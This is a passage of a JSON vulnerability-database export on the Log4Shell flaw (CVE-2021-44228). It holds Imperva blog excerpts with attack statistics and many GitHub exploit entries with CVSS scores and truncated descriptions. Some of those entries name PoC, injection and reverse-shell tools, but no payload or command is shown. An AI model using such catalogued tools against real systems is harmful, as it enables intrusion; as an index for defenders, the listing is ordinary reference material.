If you\u2019re looking for protection from CVE-2021-44228, please [contact us](<https://www.imperva.com/contact-us/>).\n\nThe post [Continuing to Stay Ahead of CVE-2021-44228: Addressing Your Top Questions ](<https://www.imperva.com/blog/continuing-to-stay-ahead-of-cve-2021-44228-addressing-your-top-questions/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T22:55:49", "type": "impervablog", "title": "Continuing to Stay Ahead of CVE-2021-44228: Addressing Your Top Questions", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T22:55:49", "id": "IMPERVABLOG:BEE8EB9D446D0AF62464EE59DFA0CE0E", "href": "https://www.imperva.com/blog/continuing-to-stay-ahead-of-cve-2021-44228-addressing-your-top-questions/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T06:45:07", "description": "Over the last week, Imperva Threat Research observed interesting data points related to CVE-2021-44228. 
Despite new variants being discovered and patched by our team, we wanted to share five interesting things that we\u2019ve learned from analyzing a subset of our overall global network traffic.\n\n## Attacks & Attacked Sites\n\nSince last week, attackers have used a combination of manual and automated tools to **target 84,000 sites** protected by Imperva Cloud WAF. Across the targeted sites, Imperva Cloud WAF has **blocked more than 20 million attacks** that were attempting to exploit CVE-2021-44228.\n\nImperva is proactively reaching out and working closely with customers whose sites are being heavily targeted. Specifically, we have created and delivered attack-related dashboards, reports, and statistics to highly targeted customers.\n\n## Classified Clients\n\nOne thing many people don\u2019t realize is that we\u2019ve built advanced client classification detection algorithms in our Cloud WAF. We leverage client classification as part of our overall security defense system, and of course share the highlights in our customer dashboards. Client values include things like web browser names (Chrome, Safari, etc.) as well as developer tools (cURL, wget, etc.). \n\nWhen looking at the overall logs, we found a couple of interesting data points with respect to the clients that generated this attack traffic:\n\n * ~47% of classified clients were developed using the Go programming language. This doesn\u2019t come as a surprise, as the Go language is popular, has a great built-in HTTP client library, and is an easy and highly performant approach for developers to execute concurrent requests (goroutines, channels, etc.). 
The long tail of clients that we classified were written in Ruby and Python.\n * ~45% of classified clients were automated bad bots, and in some cases, are the same bots that have been used previously for attacks like account takeover, scraping, token fraud, etc.\n\n## Globally Targeted Industries\n\nThe top targeted industries include the following:\n\nAs you can see from the above chart, it appears like a normal distribution across targeted industries. \n\n## Top 10 Countries Attacking US Customers\n\nWhen factoring in the attacking country of origin targeting the United States, the data reveals several interesting points.\n\nIt gets even more interesting when breaking down the attacking countries targeting industries:\n\n 1. 9 of the top 10 attacking countries are European. These 9 countries focused on customers in Computing & IT, Financial Services, and Travel.\n 2. Finland was the largest source targeting Computing & IT.\n 3. India was the only non-European country in the top 10 attacking countries list. Attackers in India, like Sweden, exclusively focused on Financial Services.\n\nImperva Threat Research is currently working on an exciting report around attack variants, how we responded, and even some video demonstrations. We look forward to sharing that report on the Imperva Blog in the coming days. \n\n[Learn how](<https://www.imperva.com/blog/continuing-to-stay-ahead-of-cve-2021-44228-addressing-your-top-questions/>) Imperva is continuing to stay ahead of CVE-2021-44228. For customers looking for support, please access the [Imperva Support Portal](<https://support.imperva.com/s/login/?ec=302&startURL=%2Fs%2F&_ga=2.79178577.490459591.1639630100-8729200.1639182510>). 
If you\u2019re looking for protection from CVE-2021-44228, please [contact us](<https://www.imperva.com/contact-us/>).\n\nThe post [5 Things We\u2019ve Learned About CVE-2021-44228](<https://www.imperva.com/blog/5-things-weve-learned-about-cve-2021-44228/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T06:44:55", "type": "impervablog", "title": "5 Things We\u2019ve Learned About CVE-2021-44228", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-17T06:44:55", "id": "IMPERVABLOG:BE9CCB7ADF74E2AEFC999FEE704CDE71", "href": "https://www.imperva.com/blog/5-things-weve-learned-about-cve-2021-44228/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-05-10T22:06:38", "description": "# Log4j-CVE-2021-44228 detector scanner playbook\n\n[ \ud655\uc778\n\n* \ucde8\uc57d\uc810 \uacf5\uc9c0\n ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", 
"attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-03T04:36:41", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-09T19:59:25", "id": "4BD74B8C-D553-57C6-AB15-6B899401AAA4", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-24T11:07:23", "description": "# Log4JPOC\nPOC for CVE-2021-44228 vulnerabilit...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-22T15:15:12", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-24T10:15:11", "id": "6F7E4100-F6E7-5C57-8A1B-89F03DCC53A6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-21T23:09:11", "description": "# Saturn\nA tool to analyze the log files from minecraft to scan ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T19:42:47", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-21T08:17:51", "id": "4F757EF2-574B-55C7-A017-51DC8BB28C31", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": 
"2022-02-27T11:59:22", "description": "# Log4j_checker.py (CVE-2021-44228)\n POC\n---------------------\n<h1 align...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T09:26:37", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-24T23:08:50", "id": "1CCC4512-40AB-5F72-9913-3D894DB4676F", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-25T18:14:01", "description": "# log4j-vulnerable-app-cve-2021-44228-terraform\nA Terraform to d...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T13:56:28", 
"type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-25T17:42:11", "id": "14482532-2406-58DF-89FF-30B085015257", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-03T13:20:56", "description": "# log4stdin — log4shell injection for anything with stdout...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-16T16:39:19", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, 
"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-02T16:13:36", "id": "78CE8E59-092E-5214-9D02-A3F5F62F22E9", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-19T21:14:43", "description": "# PS-CVE-2021-44228\nStatic detection of vulnerable log4j librair...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-17T12:46:20", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-19T08:30:13", "id": "75180259-16B4-5B60-9913-BFC9A306560A", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:16:20", "description": "## Details and Mitigation Strategy for log4j2 RCE Vulnerability\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-10T20:39:56", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-11T16:21:03", "id": "5233D0F2-69A2-5220-8016-07D66C226F01", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-30T18:15:10", "description": "# log4j-scanner\n\nCheck CVE-2021-44228 vulnerab...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T07:59:14", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-30T16:35:24", "id": "76E7C0B8-1EE5-543A-A48E-E3AAEAA8BFF6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-22T23:08:39", "description": "# Get-log4j-Windows-local.ps1\n \n Identify all log4j components ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-19T07:35:01", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-22T18:50:17", "id": "7865A97A-CD10-5E45-9429-CF5F72A6952B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:14:30", "description": "# 
Log4j-CVE-2021-44228\nLog4j Remote Cod...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T08:40:13", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T10:29:05", "id": "5FC55783-FDF5-5AD8-98B2-C1CBFB4EFCCA", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-24T09:27:27", "description": "# Log4j2-CVE-2021-44228-revshell\n\n \n## Usage\n\n For reverse...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T05:24:52", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data 
in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-24T07:01:14", "id": "3A1D442B-2B5B-5DEA-9276-9A9B6C06C9DF", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-16T23:07:15", "description": "# CVE-2021-44228(Apache Log4j Remote Code Execution\uff09\n\n> [all log...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T20:02:09", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2021-44228"], "modified": "2021-12-16T20:05:17", "id": "9227EA61-CA01-5E0A-AF8D-22B03C07A27A", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-18T23:41:33", "description": "# Log4Shell in action\n\nThis project aims to demonstrate how the ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-19T10:57:16", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-18T19:42:45", "id": "4DBC05D1-8178-5715-953D-61ECC89104F4", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:14:25", "description": "# anti-jndi\nFun things against the abuse of the recent CVE-2021-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, 
"privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T00:23:20", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T22:21:20", "id": "A1E14906-26B2-5DF8-95E3-07736CC5DDF2", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-28T11:08:10", "description": "# CVE-2021-44228(Apache Log4j Remote Code Execution\uff09\n\n> [all log...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-27T17:06:26", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": 